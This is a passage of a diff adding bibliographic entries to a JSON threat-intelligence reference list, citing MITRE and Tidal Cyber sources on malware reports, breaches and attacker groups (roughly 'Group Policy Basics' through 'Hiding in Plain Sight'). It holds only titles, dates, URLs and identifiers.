"https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/" + ], + "source": "MITRE", + "title": "Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object" + }, + "related": [], + "uuid": "9b9c8c6c-c272-424e-a594-a34b7bf62477", + "value": "TechNet Group Policy Basics" + }, + { + "description": "Microsoft. (2016, August 31). Group Policy Preferences. Retrieved March 9, 2020.", + "meta": { + "date_accessed": "2020-03-09T00:00:00Z", + "date_published": "2016-08-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)" + ], + "source": "MITRE", + "title": "Group Policy Preferences" + }, + "related": [], + "uuid": "fa3beaf1-81e7-411b-849a-24cffaf7c552", + "value": "Microsoft GPP 2016" + }, + { + "description": "Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020.", + "meta": { + "date_accessed": "2020-06-24T00:00:00Z", + "date_published": "2020-04-22T00:00:00Z", + "refs": [ + "https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities" + ], + "source": "MITRE", + "title": "Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities" + }, + "related": [], + "uuid": "cba14230-13bc-47ad-8f3f-d798217657bd", + "value": "Venafi SSH Key Abuse" + }, + { + "description": "Wikibooks. (2018, August 19). Grsecurity/The RBAC System. Retrieved June 4, 2020.", + "meta": { + "date_accessed": "2020-06-04T00:00:00Z", + "date_published": "2018-08-19T00:00:00Z", + "refs": [ + "https://en.wikibooks.org/wiki/Grsecurity/The_RBAC_System" + ], + "source": "MITRE", + "title": "Grsecurity/The RBAC System" + }, + "related": [], + "uuid": "8a7abfa0-97e8-4cac-9d76-c886e9666a16", + "value": "Wikibooks Grsecurity" + }, + { + "description": "TrueSec. (n.d.). gsecdump v2.0b5. Retrieved September 29, 2015.", + "meta": { + "date_accessed": "2015-09-29T00:00:00Z", + "refs": [ + "https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5" + ], + "source": "MITRE", + "title": "gsecdump v2.0b5" + }, + "related": [], + "uuid": "ba1d07ed-2e18-4f5f-9d44-082530946f14", + "value": "TrueSec Gsecdump" + }, + { + "description": "Emilio Pinna, Andrea Cardaci. (n.d.). GTFOBins. Retrieved January 28, 2022.", + "meta": { + "date_accessed": "2022-01-28T00:00:00Z", + "refs": [ + "https://gtfobins.github.io/#+suid" + ], + "source": "MITRE", + "title": "GTFOBins" + }, + "related": [], + "uuid": "0b7d8e81-da8e-4f6a-a1b7-4ed81e441b4d", + "value": "GTFOBins Suid" + }, + { + "description": "Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "refs": [ + "https://gtfobins.github.io/gtfobins/at/" + ], + "source": "MITRE", + "title": "gtfobins at" + }, + "related": [], + "uuid": "3fad6618-5a85-4f7a-be2b-0600269d7768", + "value": "GTFObins at" + }, + { + "description": "Rotem Sde-Or. (2022, February 15). Guard Your Drive from DriveGuard: Moses Staff Campaigns Against Israeli Organizations Span Several Months. Retrieved October 23, 2023.", + "meta": { + "date_accessed": "2023-10-23T00:00:00Z", + "date_published": "2022-02-15T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard" + ], + "source": "Tidal Cyber", + "title": "Guard Your Drive from DriveGuard: Moses Staff Campaigns Against Israeli Organizations Span Several Months" + }, + "related": [], + "uuid": "4a435edb-18ae-4c31-beff-2b8f2e6cad34", + "value": "Fortinet Moses Staff February 15 2022" + }, + { + "description": "Duncan, B. (2020, April 3). GuLoader: Malspam Campaign Installing NetWire RAT. Retrieved January 7, 2021.", + "meta": { + "date_accessed": "2021-01-07T00:00:00Z", + "date_published": "2020-04-03T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/" + ], + "source": "MITRE", + "title": "GuLoader: Malspam Campaign Installing NetWire RAT" + }, + "related": [], + "uuid": "b42f119d-144a-470a-b9fe-ccbf80a78fbb", + "value": "Unit 42 NETWIRE April 2020" + }, + { + "description": "Reynolds, J.. (2016, September 13). H1N1: Technical analysis reveals new capabilities. Retrieved September 26, 2016.", + "meta": { + "date_accessed": "2016-09-26T00:00:00Z", + "date_published": "2016-09-13T00:00:00Z", + "refs": [ + "http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" + ], + "source": "MITRE", + "title": "H1N1: Technical analysis reveals new capabilities" + }, + "related": [], + "uuid": "03a2faca-1a47-4f68-9f26-3fa98145f2ab", + "value": "Cisco H1N1 Part 1" + }, + { + "description": "Reynolds, J.. (2016, September 14). H1N1: Technical analysis reveals new capabilities – part 2. Retrieved September 26, 2016.", + "meta": { + "date_accessed": "2016-09-26T00:00:00Z", + "date_published": "2016-09-14T00:00:00Z", + "refs": [ + "http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities-part-2" + ], + "source": "MITRE", + "title": "H1N1: Technical analysis reveals new capabilities – part 2" + }, + "related": [], + "uuid": "b53e55dc-078d-4535-a99f-c979ad8ca6e6", + "value": "Cisco H1N1 Part 2" + }, + { + "description": "Barrett, B.. (2019, July 11). Hack Brief: A Card-Skimming Hacker Group Hit 17K Domains—and Counting. Retrieved October 4, 2019.", + "meta": { + "date_accessed": "2019-10-04T00:00:00Z", + "date_published": "2019-07-11T00:00:00Z", + "refs": [ + "https://www.wired.com/story/magecart-amazon-cloud-hacks/" + ], + "source": "MITRE", + "title": "Hack Brief: A Card-Skimming Hacker Group Hit 17K Domains—and Counting" + }, + "related": [], + "uuid": "47fb06ed-b4ce-454c-9bbe-21b28309f351", + "value": "Wired Magecart S3 Buckets, 2019" + }, + { + "description": "Andy Greenberg. (2017, January 21). Hack Brief: Uber Paid Off Hackers to Hide a 57-Million User Data Breach. Retrieved May 14, 2021.", + "meta": { + "date_accessed": "2021-05-14T00:00:00Z", + "date_published": "2017-01-21T00:00:00Z", + "refs": [ + "https://www.wired.com/story/uber-paid-off-hackers-to-hide-a-57-million-user-data-breach/" + ], + "source": "MITRE", + "title": "Hack Brief: Uber Paid Off Hackers to Hide a 57-Million User Data Breach" + }, + "related": [], + "uuid": "3bdf88b3-8f41-4945-9292-e299bab4f98e", + "value": "Wired Uber Breach" + }, + { + "description": "Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019.", + "meta": { + "date_accessed": "2019-04-10T00:00:00Z", + "date_published": "2018-11-29T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets" + ], + "source": "MITRE", + "title": "Hacker Infects Node.js Package to Steal from Bitcoin Wallets" + }, + "related": [], + "uuid": "69eac1b0-1c50-4534-99e0-2d0fd738ab8f", + "value": "Trendmicro NPM Compromise" + }, + { + "description": "Mimoso, M.. (2014, June 18). Hacker Puts Hosting Service Code Spaces Out of Business. Retrieved December 15, 2020.", + "meta": { + "date_accessed": "2020-12-15T00:00:00Z", + "date_published": "2014-06-18T00:00:00Z", + "refs": [ + "https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/" + ], + "source": "MITRE", + "title": "Hacker Puts Hosting Service Code Spaces Out of Business" + }, + "related": [], + "uuid": "97d16d3a-98a0-4a7d-9f74-8877c8088ddf", + "value": "Data Destruction - Threat Post" + }, + { + "description": "Bill Toulas. (2023, August 2). Hackers exploited Salesforce zero-day in Facebook phishing attack. Retrieved September 18, 2023.", + "meta": { + "date_accessed": "2023-09-18T00:00:00Z", + "date_published": "2023-08-02T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/hackers-exploited-salesforce-zero-day-in-facebook-phishing-attack/" + ], + "source": "MITRE", + "title": "Hackers exploited Salesforce zero-day in Facebook phishing attack" + }, + "related": [], + "uuid": "cbd360bb-f4b6-5326-8861-b05f3a2a8737", + "value": "Salesforce zero-day in facebook phishing attack" + }, + { + "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.", + "meta": { + "date_accessed": "2018-06-06T00:00:00Z", + "date_published": "2017-09-06T00:00:00Z", + "refs": [ + "http://fortune.com/2017/09/06/hack-energy-grid-symantec/" + ], + "source": "MITRE", + "title": "Hackers Have Penetrated Energy Grid, Symantec Warns" + }, + "related": [], + "uuid": "b56c5b41-b8e0-4fef-a6d8-183bb283dc7c", + "value": "Fortune Dragonfly 2.0 Sept 2017" + }, + { + "description": "Brennan, M. (2022, February 16). Hackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection. Retrieved August 22, 2022.", + "meta": { + "date_accessed": "2022-08-22T00:00:00Z", + "date_published": "2022-02-16T00:00:00Z", + "refs": [ + "https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection" + ], + "source": "MITRE", + "title": "Hackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection" + }, + "related": [], + "uuid": "e9f91661-29e3-408e-bfdd-c7df22f3f400", + "value": "Huntress API Hash" + }, + { + "description": "Sergiu Gatlan. (2020, April 16). Hackers steal WiFi passwords using upgraded Agent Tesla malware. Retrieved September 8, 2023.", + "meta": { + "date_accessed": "2023-09-08T00:00:00Z", + "date_published": "2020-04-16T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/hackers-steal-wifi-passwords-using-upgraded-agent-tesla-malware/" + ], + "source": "MITRE", + "title": "Hackers steal WiFi passwords using upgraded Agent Tesla malware" + }, + "related": [], + "uuid": "93b5ecd2-35a3-5bd8-9d6e-87bace012546", + "value": "BleepingComputer Agent Tesla steal wifi passwords" + }, + { + "description": "Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2019-10-24T00:00:00Z", + "refs": [ + "https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages" + ], + "source": "MITRE", + "title": "Hackers Try to Phish United Nations Staffers With Fake Login Pages" + }, + "related": [], + "uuid": "f652524c-7950-4a8a-9860-0e658a9581d8", + "value": "PCMag FakeLogin" + }, + { + "description": "Brian Krebs. (2016, October 31). Hackforums Shutters Booter Service Bazaar. Retrieved May 15, 2017.", + "meta": { + "date_accessed": "2017-05-15T00:00:00Z", + "date_published": "2016-10-31T00:00:00Z", + "refs": [ + "https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/" + ], + "source": "MITRE", + "title": "Hackforums Shutters Booter Service Bazaar" + }, + "related": [], + "uuid": "b46efda2-18e0-451e-b945-28421c2d5274", + "value": "Krebs-Bazaar" + }, + { + "description": "Ilascu, I. (2020, December 14). Hacking group’s new malware abuses Google and Facebook services. Retrieved December 28, 2020.", + "meta": { + "date_accessed": "2020-12-28T00:00:00Z", + "date_published": "2020-12-14T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/" + ], + "source": "MITRE", + "title": "Hacking group’s new malware abuses Google and Facebook services" + }, + "related": [], + "uuid": "307108c8-9c72-4f31-925b-0b9bd4b31e7b", + "value": "BleepingComputer Molerats Dec 2020" + }, + { + "description": "Microsoft Secure Team. (2016, June 1). Hacking Team Breach: A Cyber Jurassic Park. Retrieved March 5, 2019.", + "meta": { + "date_accessed": "2019-03-05T00:00:00Z", + "date_published": "2016-06-01T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/" + ], + "source": "MITRE", + "title": "Hacking Team Breach: A Cyber Jurassic Park" + }, + "related": [], + "uuid": "8daac742-6467-40db-9fe5-87efd2a96f09", + "value": "Microsoft Hacking Team Breach" + }, + { + "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.", + "meta": { + "date_accessed": "2017-03-20T00:00:00Z", + "date_published": "2005-07-16T00:00:00Z", + "refs": [ + "http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html" + ], + "source": "MITRE", + "title": "HackingTeam's UEFI Rootkit Details" + }, + "related": [], + "uuid": "1c476cb2-8ce0-4559-8037-646d0ea09398", + "value": "Intel HackingTeam UEFI Rootkit" + }, + { + "description": "Lin, P. (2015, July 13). Hacking Team Uses UEFI BIOS Rootkit to Keep RCS 9 Agent in Target Systems. Retrieved December 11, 2015.", + "meta": { + "date_accessed": "2015-12-11T00:00:00Z", + "date_published": "2015-07-13T00:00:00Z", + "refs": [ + "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/" + ], + "source": "MITRE", + "title": "Hacking Team Uses UEFI BIOS Rootkit to Keep RCS 9 Agent in Target Systems" + }, + "related": [], + "uuid": "24796535-d516-45e9-bcc7-8f03a3f3cd73", + "value": "TrendMicro Hacking Team UEFI" + }, + { + "description": "Temperton, J. (2015, August 10). Hacking Team zero-day used in new Darkhotel attacks. Retrieved March 9, 2017.", + "meta": { + "date_accessed": "2017-03-09T00:00:00Z", + "date_published": "2015-08-10T00:00:00Z", + "refs": [ + "https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage" + ], + "source": "MITRE", + "title": "Hacking Team zero-day used in new Darkhotel attacks" + }, + "related": [], + "uuid": "4de7960b-bd62-452b-9e64-b52a0d580858", + "value": "TempertonDarkHotel" + }, + { + "description": "Vengerik, B. & Dennesen, K.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved January 15, 2019.", + "meta": { + "date_accessed": "2019-01-15T00:00:00Z", + "date_published": "2014-12-05T00:00:00Z", + "refs": [ + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html" + ], + "source": "MITRE", + "title": "Hacking the Street? FIN4 Likely Playing the Market" + }, + "related": [], + "uuid": "6dcfe3fb-c310-49cf-a657-f2cec65c5499", + "value": "FireEye Hacking FIN4 Video Dec 2014" + }, + { + "description": "Vengerik, B. et al.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved December 17, 2018.", + "meta": { + "date_accessed": "2018-12-17T00:00:00Z", + "date_published": "2014-12-05T00:00:00Z", + "refs": [ + "https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf" + ], + "source": "MITRE", + "title": "Hacking the Street? FIN4 Likely Playing the Market" + }, + "related": [], + "uuid": "c3ac1c2a-21cc-42a9-a214-88f302371766", + "value": "FireEye Hacking FIN4 Dec 2014" + }, + { + "description": "Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating leaky buckets into your OSINT workflow. Retrieved February 14, 2022.", + "meta": { + "date_accessed": "2022-02-14T00:00:00Z", + "date_published": "2019-09-13T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/" + ], + "source": "MITRE", + "title": "Hacking with AWS: incorporating leaky buckets into your OSINT workflow" + }, + "related": [], + "uuid": "67ebcf71-828e-4202-b842-f071140883f8", + "value": "Malwarebytes OSINT Leaky Buckets - Hioureas" + }, + { + "description": "MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.", + "meta": { + "date_accessed": "2021-03-03T00:00:00Z", + "date_published": "2021-03-02T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/" + ], + "source": "MITRE, Tidal Cyber", + "title": "HAFNIUM targeting Exchange Servers with 0-day exploits" + }, + "related": [], + "uuid": "6a986c46-79a3-49c6-94d2-d9b1f5db08f3", + "value": "Microsoft HAFNIUM March 2020" + }, + { + "description": "Luis Martin Garcia. (2008, February 1). Hakin9 Issue 2/2008 Vol 3 No.2 VoIP Abuse: Storming SIP Security. Retrieved October 18, 2022.", + "meta": { + "date_accessed": "2022-10-18T00:00:00Z", + "date_published": "2008-02-01T00:00:00Z", + "refs": [ + "http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf" + ], + "source": "MITRE", + "title": "Hakin9 Issue 2/2008 Vol 3 No.2 VoIP Abuse: Storming SIP Security" + }, + "related": [], + "uuid": "2803d0b8-78ee-4b19-aad3-daf84cd292b5", + "value": "haking9 libpcap network sniffing" + }, + { + "description": "FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.", + "meta": { + "date_accessed": "2015-09-17T00:00:00Z", + "date_published": "2015-07-01T00:00:00Z", + "refs": [ + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" + ], + "source": "MITRE", + "title": "HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group" + }, + "related": [], + "uuid": "78ead31e-7450-46e8-89cf-461ae1981994", + "value": "FireEye APT29" + }, + { + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020.", + "meta": { + "date_accessed": "2020-08-13T00:00:00Z", + "date_published": "2016-09-23T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html" + ], + "source": "MITRE", + "title": "Hancitor (AKA Chanitor) observed using multiple attack approaches" + }, + "related": [], + "uuid": "65a07c8c-5b29-445f-8f01-6e577df4ea62", + "value": "FireEye Hancitor" + }, + { + "description": "Matthews, M. and Backhouse, W. (2021, June 15). Handy guide to a new Fivehands ransomware variant. Retrieved June 24, 2021.", + "meta": { + "date_accessed": "2021-06-24T00:00:00Z", + "date_published": "2021-06-15T00:00:00Z", + "refs": [ + "https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/" + ], + "source": "MITRE", + "title": "Handy guide to a new Fivehands ransomware variant" + }, + "related": [], + "uuid": "33955c35-e8cd-4486-b1ab-6f992319c81c", + "value": "NCC Group Fivehands June 2021" + }, + { + "description": "Apple Inc.. (2021, January 1). Hardened Runtime: Manage security protections and resource access for your macOS apps.. Retrieved March 24, 2021.", + "meta": { + "date_accessed": "2021-03-24T00:00:00Z", + "date_published": "2021-01-01T00:00:00Z", + "refs": [ + "https://developer.apple.com/documentation/security/hardened_runtime" + ], + "source": "MITRE", + "title": "Hardened Runtime: Manage security protections and resource access for your macOS apps." + }, + "related": [], + "uuid": "b41de1e5-63ab-4556-a61f-3baca1873283", + "value": "Apple Developer Doco Hardened Runtime" + }, + { + "description": "Bromiley, M., et al.. (2019, July 18). Hard Pass: Declining APT34’s Invite to Join Their Professional Network. Retrieved August 26, 2019.", + "meta": { + "date_accessed": "2019-08-26T00:00:00Z", + "date_published": "2019-07-18T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" + ], + "source": "MITRE", + "title": "Hard Pass: Declining APT34’s Invite to Join Their Professional Network" + }, + "related": [], + "uuid": "09a00ded-1afc-4555-894e-a151162796eb", + "value": "FireEye APT34 July 2019" + }, + { + "description": "Dunning, J. (2016, August 1). Hashjacking. Retrieved December 21, 2017.", + "meta": { + "date_accessed": "2017-12-21T00:00:00Z", + "date_published": "2016-08-01T00:00:00Z", + "refs": [ + "https://github.com/hob0/hashjacking" + ], + "source": "MITRE", + "title": "Hashjacking" + }, + "related": [], + "uuid": "d31f6612-c552-45e1-bf6b-889fe619ab5f", + "value": "GitHub Hashjacking" + }, + { + "description": "Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18, 2019.", + "meta": { + "date_accessed": "2019-06-18T00:00:00Z", + "date_published": "2017-07-25T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html" + ], + "source": "MITRE", + "title": "HawkEye Credential Theft Malware Distributed in Recent Phishing Campaign" + }, + "related": [], + "uuid": "7ad228a8-5450-45ec-86fc-ea038f7c6ef7", + "value": "FireEye HawkEye Malware July 2017" + }, + { + "description": "Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019.", + "meta": { + "date_accessed": "2019-10-04T00:00:00Z", + "date_published": "2018-09-12T00:00:00Z", + "refs": [ + "https://posts.specterops.io/head-in-the-clouds-bd038bb69e48" + ], + "source": "MITRE", + "title": "Head in the Clouds" + }, + "related": [], + "uuid": "95d6d1ce-ceba-48ee-88c4-0fb30058bd80", + "value": "Specter Ops - Cloud Credential Storage" + }, + { + "description": "KONSTANTIN ZYKOV. (2019, September 23). Hello! My name is Dtrack. Retrieved September 30, 2022.", + "meta": { + "date_accessed": "2022-09-30T00:00:00Z", + "date_published": "2019-09-23T00:00:00Z", + "refs": [ + "https://securelist.com/my-name-is-dtrack/93338/" + ], + "source": "MITRE", + "title": "Hello! My name is Dtrack" + }, + "related": [], + "uuid": "a011b68a-30e0-4204-9bf3-fa73f2a238b4", + "value": "Securelist Dtrack2" + }, + { + "description": "Konstantin Zykov. (2019, September 23). Hello! My name is Dtrack. Retrieved January 20, 2021.", + "meta": { + "date_accessed": "2021-01-20T00:00:00Z", + "date_published": "2019-09-23T00:00:00Z", + "refs": [ + "https://securelist.com/my-name-is-dtrack/93338/" + ], + "source": "MITRE", + "title": "Hello! My name is Dtrack" + }, + "related": [], + "uuid": "49bd8841-a4b5-4ced-adfa-0ad0c8625ccd", + "value": "Securelist Dtrack" + }, + { + "description": "Mark Baggett. (2012, November 8). Help eliminate unquoted path vulnerabilities. Retrieved November 8, 2012.", + "meta": { + "date_accessed": "2012-11-08T00:00:00Z", + "date_published": "2012-11-08T00:00:00Z", + "refs": [ + "https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464" + ], + "source": "MITRE", + "title": "Help eliminate unquoted path vulnerabilities" + }, + "related": [], + "uuid": "23ad5a8c-cbe1-4f40-8757-f1784a4003a1", + "value": "Help eliminate unquoted path" + }, + { + "description": "Baggett, M. (2012, November 8). Help eliminate unquoted path vulnerabilities. Retrieved December 4, 2014.", + "meta": { + "date_accessed": "2014-12-04T00:00:00Z", + "date_published": "2012-11-08T00:00:00Z", + "refs": [ + "https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464" + ], + "source": "MITRE", + "title": "Help eliminate unquoted path vulnerabilities" + }, + "related": [], + "uuid": "9b234329-5e05-4035-af38-dd8ab20fd68e", + "value": "Baggett 2012" + }, + { + "description": "Kellie Eickmeyer. (2022, February 7). Helping users stay safe: Blocking internet macros by default in Office. Retrieved February 7, 2022.", + "meta": { + "date_accessed": "2022-02-07T00:00:00Z", + "date_published": "2022-02-07T00:00:00Z", + "refs": [ + "https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805" + ], + "source": "MITRE", + "title": "Helping users stay safe: Blocking internet macros by default in Office" + }, + "related": [], + "uuid": "d86883dd-3766-4971-91c7-b205ed13cc37", + "value": "Default VBS macros Blocking" + }, + { + "description": "Carr, N. (2018, January 31). Here is some early bad cmstp.exe... Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2018-01-31T00:00:00Z", + "refs": [ + "https://twitter.com/ItsReallyNick/status/958789644165894146" + ], + "source": "MITRE", + "title": "Here is some early bad cmstp.exe.." + }, + "related": [], + "uuid": "836621f3-83e1-4c55-8e3b-740fc9ba1e46", + "value": "Twitter CMSTP Usage Jan 2018" + }, + { + "description": "ESET. (2022, February 24). HermeticWiper: New data wiping malware hits Ukraine. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "date_published": "2022-02-24T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine" + ], + "source": "MITRE", + "title": "HermeticWiper: New data wiping malware hits Ukraine" + }, + "related": [], + "uuid": "07ef66e8-195b-4afe-a518-ce9e77220038", + "value": "ESET Hermetic Wiper February 2022" + }, + { + "description": "Guerrero-Saade, J. (2022, February 23). HermeticWiper | New Destructive Malware Used In Cyber Attacks on Ukraine. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "date_published": "2022-02-23T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack" + ], + "source": "MITRE", + "title": "HermeticWiper | New Destructive Malware Used In Cyber Attacks on Ukraine" + }, + "related": [], + "uuid": "96825555-1936-4ee3-bb25-423dc16a9116", + "value": "SentinelOne Hermetic Wiper February 2022" + }, + { + "description": "Dragos. (n.d.). Hexane. Retrieved October 27, 2019.", + "meta": { + "date_accessed": "2019-10-27T00:00:00Z", + "refs": [ + "https://dragos.com/resource/hexane/" + ], + "source": "MITRE", + "title": "Hexane" + }, + "related": [], + "uuid": "11838e67-5032-4352-ad1f-81ba0398a14f", + "value": "Dragos Hexane" + }, + { + "description": "Sourceforge. (n.d.). Heyoka POC Exfiltration Tool. Retrieved October 11, 2022.", + "meta": { + "date_accessed": "2022-10-11T00:00:00Z", + "refs": [ + "https://heyoka.sourceforge.net/" + ], + "source": "MITRE", + "title": "Heyoka POC Exfiltration Tool" + }, + "related": [], + "uuid": "f6677391-cb7a-4abc-abb7-3a8cd47fbc90", + "value": "Sourceforge Heyoka 2022" + }, + { + "description": "LOLBAS. (2018, May 25). Hh.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Hh/" + ], + "source": "Tidal Cyber", + "title": "Hh.exe" + }, + "related": [], + "uuid": "4e09bfcf-f5be-46c5-9ebf-8742ac8d1edc", + "value": "Hh.exe - LOLBAS Project" + }, + { + "description": "Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020.", + "meta": { + "date_accessed": "2020-10-28T00:00:00Z", + "date_published": "2018-04-24T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/" + ], + "source": "MITRE", + "title": "Hidden Administrative Accounts: BloodHound to the Rescue" + }, + "related": [], + "uuid": "fa99f290-e42c-4311-9f6d-c519c9ab89fe", + "value": "CrowdStrike BloodHound April 2018" + }, + { + "description": "Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.", + "meta": { + "date_accessed": "2018-05-18T00:00:00Z", + "date_published": "2018-03-08T00:00:00Z", + "refs": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" + ], + "source": "MITRE", + "title": "Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant" + }, + "related": [], + "uuid": "c748dc6c-8c19-4a5c-840f-3d47955a6c78", + "value": "McAfee Bankshot" + }, + { + "description": "Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in Microsoft Exchange. Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "date_published": "2018-09-17T00:00:00Z", + "refs": [ + "https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/" + ], + "source": "MITRE", + "title": "Hidden Inbox Rules in Microsoft Exchange" + }, + "related": [], + "uuid": "8a00b664-5a75-4365-9069-a32e0ed20a80", + "value": "Pfammatter - Hidden Inbox Rules" + }, + { + "description": "Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.", + "meta": { + "date_accessed": "2019-06-24T00:00:00Z", + "date_published": "2019-05-29T00:00:00Z", + "refs": [ + "https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/" + ], + "source": "MITRE", + "title": "HiddenWasp Malware Stings Targeted Linux Systems" + }, + "related": [], + "uuid": "dfef8451-031b-42a6-8b78-d25950cc9d23", + "value": "Intezer HiddenWasp Map 2019" + }, + { + "description": "Apple. (2020, November 30). Hide a user account in macOS. Retrieved December 10, 2021.", + "meta": { + "date_accessed": "2021-12-10T00:00:00Z", + "date_published": "2020-11-30T00:00:00Z", + "refs": [ + "https://support.apple.com/en-us/HT203998" + ], + "source": "MITRE", + "title": "Hide a user account in macOS" + }, + "related": [], + "uuid": "e901df3b-76a6-41a5-9083-b28065e75aa2", + "value": "Apple Support Hide a User Account" + }, + { + "description": "Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved August 3, 2020.", + "meta": { + "date_accessed": "2020-08-03T00:00:00Z", + "date_published": "2016-03-30T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/" + ], + "source": "MITRE", + "title": "Hiding in Plain Sight" + }, + "related": [], + "uuid": "d4eba34c-d76b-45b4-bcaf-0f13459daaad", + "value": "Malwarebytes Wow6432Node 2016" + }, + { + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "meta": { + "date_accessed": "2016-01-22T00:00:00Z", + "date_published": 